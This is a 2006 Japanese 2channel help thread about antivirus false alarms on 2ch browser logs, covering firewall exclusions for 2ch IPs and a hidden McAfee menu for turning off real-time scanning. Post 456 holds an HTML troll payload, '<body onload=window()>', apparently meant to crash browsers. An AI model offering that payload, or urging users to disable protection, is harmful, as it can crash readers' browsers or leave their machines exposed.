ansitu.xrea.jp/guidance/?Trap#NortonTrap
431 名前：428 mailto:sage [2006/02/07(火) 06:33:12 ID:???]: >>430
丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました！感謝です！
432 名前：421 [2006/02/07(火) 09:35:42 ID:mnvRCCNZ]: 以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。

結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は（以下コピペ）
www.mcafee.com/japan/pqa/aMcAfeeMvs.asp?ancQno=MV05040434&ancProd=McAfeeMvs
>また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またｖｂｓウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。
433 名前：ひよこ名無しさん mailto:sage [2006/02/08(水) 17:28:05 ID:???]: >>430
>この場合2ちゃんねるに対してファイアーウォールの機能は働きません。

ということですが、それはセキュリティ的には問題ないレベルなんですか？

あと↓によると
２chNIS問題まとめページ
mickey.mirv.net/2chnis.html

>以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。

とありますが、２ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか？
それとも除外したIPアドレスは２ちゃん以外では使われてないのでしょうか？

分かる方いらっしゃったらご教授お願いします
434 名前：名無しさん＠お腹いぱーい。 mailto:sage [2006/02/08(水) 22:45:25 ID:??? BE:6288858- ]: >>432
お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。

>>433
> ２ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか？

２ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。

また、２ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための２ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
pc.2ch.net/sec/kako/1037/10377/1037772137.html の7

只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.82【2006】
pc8.2ch.net/test/read.cgi/sec/1138802896/

> それとも除外したIPアドレスは２ちゃん以外では使われてないのでしょうか？

おそらくないはずですが、２ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215＠運用情報板
qb5.2ch.net/test/read.cgi/operate/1139244364/

関連スレ
ノートン誤作動対策本部
qb5.2ch.net/test/read.cgi/operate/1133161720/
435 名前：433 mailto:sage [2006/02/08(水) 23:50:59 ID:???]: >>434
お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました
436 名前：ひよこ名無しさん mailto:sage [2006/02/18(土) 20:12:50 ID:???]: ここできいていいのかあれだけど、
updateして再起動してからjane開いて更新しようとすると

中危険度の小窓がいちいち表示されるようになった
「jane.exeがインターネットにアクセスしようとしています」
security無効にすると更新できるけど、前は有効のままで更新できてたの・・

解除方法おしえてくださいm(_ _)m
437 名前：ひよこ名無しさん mailto:sage [2006/02/18(土) 20:37:00 ID:???]: FWが反応してるだけみたいだね。

アプリ登録するだけじゃないのかな。

まあ、ノートン使ってないんでFWの一般論だけど。
438 名前：ひよこ名無しさん [2006/02/24(金) 07:54:27 ID:/hbjD2Uq]: 2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで
ウイルス踏んじゃったらどうなるんですか？ノートンは守ってくれないんですか？
439 名前：ひよこ名無しさん mailto:sage [2006/02/24(金) 09:20:24 ID:???]: そんなノートンは窓から捨てろｗｗｗｗｗｗｗｗｗｗｗ
440 名前：ひよこ名無しさん mailto:sage [2006/02/24(金) 14:13:12 ID:???]: >>438
2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。
441 名前：ひよこ名無しさん mailto:sage [2006/02/24(金) 23:01:38 ID:???]: >>438
　　　　　　　　　　　　　　＿＿
　　　　　　　　　　　　　／;;;;;;;;;;;;;＼
　　　　　　　　　　　　/;;:::::::::::::::::::::::＼
　　　　　　　∈＝━/,,;;:::::::::::::::::::::::::.;ヽ━＝∋
　　　　　　　　　　　 L::;;,＿_　　　　　..:::ゝ
　　　　　　　　　　//;;;;::::::..￣￣￣￣..::::;;;ヽ
　　　　　　　　　 /　;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
　　　　　　　　 /ｊ/三三三三三三三三三三ヾ､
　　　　　　　　l::||::::　　　　　　　　　　　　　|l　　
　　　　　　　／￣＼ヽ-=・=-′ヽ-=・=-′ ||　　
　　　　　　r┤　　　ﾄ:::::　＼＿＿_／　　 || 　　　＜信じろ！
　　　　　/　＼＿／ヽ:::.　　＼／　　　　,ノ　　　
　　　　 |　　　＿(￣　ｌ―---oo-――'"ヽ＿＿
　　　　 |　　　＿)＿ノヽ＼　　ハ／／ /　　　ヽ　　
　　　　　ヽ＿＿__)ノ　　　￣￣￣　　 /　　　　　ヽ､
442 名前：ひよこ名無しさん [2006/02/24(金) 23:29:37 ID:/hbjD2Uq]: >>440
ありがとうございます
443 名前：ひよこ名無しさん [2006/02/28(火) 01:33:27 ID:icpaH3Er]: JANE　DOE　STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に
ノートンが「xxxxxが1つ以上の認識されないモジュールを使ってインターネットにアクセスしようとしています」
と出て、許可にしないとプログラム実行されず、何も出来ないのですが、これはウィルスに感染してるのでしょうか？
スキャンしても検出されず、過去ログ検索対象外にしても出続けます。
知恵をください。お願いします。
444 名前：ひよこ名無しさん [2006/02/28(火) 09:18:46 ID:GU2WNsCd]: >>443
ＶＢＳを踏んだってのはソースが貼り付けてあるスレを開いたってこと？
それともＶＢＳが実行されたってこと？
445 名前：443 mailto:sage [2006/02/28(火) 11:01:38 ID:???]: >>444
スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。
446 名前：ひよこ名無しさん mailto:sage [2006/03/01(水) 15:04:09 ID:???]: >>445
リストから全部削除しろ　バカ
WindowsUpdateしていたら何にも感染などしねえわ
447 名前：ひよこ名無しさん mailto:sage [2006/03/01(水) 21:25:32 ID:???]: >>446
> WindowsUpdateしていたら何にも感染などしねえわ

それはどうかな？
448 名前：ひよこ名無しさん mailto:sage [2006/03/02(木) 19:57:05 ID:???]: >>371で板の見れない問題は解決したのですが、これは危険なのですか？
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか？
449 名前：ひよこ名無しさん mailto:sage [2006/03/02(木) 21:46:27 ID:???]: >>448
202.222.31.214 206.223.147.35 （ｒｙって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。
450 名前：ひよこ名無しさん mailto:sage [2006/03/02(木) 21:49:48 ID:???]: >>446
Microsft Update 入れてください（＞＜）
451 名前：448 mailto:sage [2006/03/03(金) 18:37:00 ID:???]: >>449
サンクス
452 名前：ひよこ名無しさん mailto:sage [2006/03/04(土) 05:32:46 ID:???]: avastがvbsウィルスのソースに誤反応
ってスレも立ってほしいなあ
453 名前：ひよこ名無しさん [2006/03/13(月) 18:59:55 ID:V3zGYCXt]: u
454 名前：ひよこ名無しさん mailto:sage [2006/03/13(月) 21:10:07 ID:???]: 元祖ぶる殿 ◆U/gDqFZzsY の自作自演
pc.2ch.net/test/read.cgi/win/1021112227/511-514

511 名前：Aya ◆U.S.S.po 投稿日：02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン（ボードにペンのような印）が
なくなってしまいました。
スタート→設定→タスクバー～を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット（？）出来るあのアイコンを出すにはどうしたら良いでしょう。

512 名前：Aya ◆U.S.S.po 投稿日：02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これをデスクトップの表示.scf として保存、
クイック起動バーにD&D。

513 名前：名無し~3.EXE 投稿日：02/05/19 13:17
>>511-512
自作自演失敗？

514 名前：名無し~3.EXE 投稿日：02/05/19 13:19
でもなんで自演なんてするの？
455 名前：ひよこ名無しさん [2006/03/21(火) 09:43:56 ID:xHVuEeZu]: u
456 名前：ひよこ名無しさん [2006/03/23(木) 14:11:32 ID:bCv+njJc]: ｷﾀ━━ <body onload=window()> ━━━ !!
457 名前：ひよこ名無しさん mailto:sage [2006/03/23(木) 14:12:39 ID:???]: >>456
さっさと消えろ　バカ

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef